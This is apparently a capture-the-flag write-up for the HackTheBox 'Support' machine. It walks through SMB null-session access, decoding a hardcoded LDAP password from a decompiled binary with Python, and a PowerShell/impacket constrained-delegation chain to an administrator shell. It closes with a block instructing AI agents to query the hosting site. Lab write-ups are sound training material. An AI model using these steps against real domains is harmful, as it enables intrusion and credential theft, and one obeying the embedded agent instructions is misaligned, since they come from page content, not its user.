# Support

## Gaining Access

Nmap scan:

<figure><img src="/files/qZiQgdVDUqkE5VdUBcwS" alt=""><figcaption></figcaption></figure>

### Null Session

I found that SMB accepts null credentials for this machine:

<figure><img src="/files/pMzD7IfMYvqz5obHxwSJ" alt=""><figcaption></figcaption></figure>

Viewing the support-tools share, we find that it contains multiple binaries.

<figure><img src="/files/TfIqpQktdei1ggKwvJGe" alt=""><figcaption></figcaption></figure>

There's only one that was interesting, and it was the `UserInfo.exe` file. I took it back to my Windows VM and used dnSpy to open it.

### dnSpy

When decompiled, it seems that the binary was sending LDAP queries:

<figure><img src="/files/hkUfX5jKOdbk1Wn7NbXu" alt=""><figcaption></figcaption></figure>

Looking around, I also found this `password` function.

<figure><img src="/files/IweML7HG3MRWyc0jGA3g" alt=""><figcaption></figcaption></figure>

We can decode this easily using some Python and following their logic.

```python
import base64
enc_pass="0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E"
key=b"armando"

array = base64.b64decode (enc_pass)
array1 = []

for i in range(len(array)):
        array1.append(chr(array[i] ^ key[i % len(key)] ^ 0xDF))

array1 = ''.join(array1)
print (array1)
```

This would output the password.

<figure><img src="/files/FbxhNfqbecxUBegYsnja" alt=""><figcaption></figcaption></figure>

### LDAPSearch

Then, since the binary does LDAP queries, I wanted to use the username and password given by the binary to query LDAP.

<figure><img src="/files/W5OkMY0ssw0jeIwwrQXl" alt=""><figcaption></figcaption></figure>

On analysing the output, I found a hidden password for the `support` user.

<figure><img src="/files/NZKMHGBtoejZP70duRM3" alt=""><figcaption></figcaption></figure>

We can then `evil-winrm` in as this `support` user.

<figure><img src="/files/gaEnA2xFDg3OQflME8Yx" alt=""><figcaption></figcaption></figure>

## Privilege Escalation

Once in, I started Bloodhound to enumerate for me. Upon reviewing the contents, I saw this interesting set of permissions over the DC.

<figure><img src="/files/YWFxBQ7KPC7r7C9PlZba" alt=""><figcaption></figcaption></figure>

We can use PowerMad and PowerView to abuse the `GenericAll` privileges.

### GenericAll Abuse

We can use this set of commands to create a new user:

{% code overflow="wrap" %}

```powershell
New-MachineAccount -MachineAccount (Get-Variable -Name "FAKE01").Value -Password $(ConvertTo-SecureString 'password@123' -AsPlainText -Force) -Verbose
Set-ADComputer (Get-Variable -Name "DC").Value -PrincipalsAllowedToDelegateToAccount ((Get-Variable -Name "FAKE01").Value + '$')
Get-ADComputer (Get-Variable -Name "DC").Value -Properties PrincipalsAllowedToDelegateToAccount
# on Linux from here 
impacket-getST support.htb/fake01 -dc-ip <IP> -impersonate administrator -spn www/dc.support.htb
export KRB5CCNAME=administrator.ccache
smbexec.py support/Administrator@support.htb -no-pass -k
```

{% endcode %}

This would spawn in a shell for us.

How it works is that we first create a new user that has the Constrained Delegation privilege. Then, we are able to impersonate the administrator and request a ticket that we can use to gain a shell with `smbexec.py`.

<figure><img src="/files/Q2ZaBfoVtUPeN6qcYSZE" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://rouvin.gitbook.io/ibreakstuff/writeups/hackthebox/easy/support.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.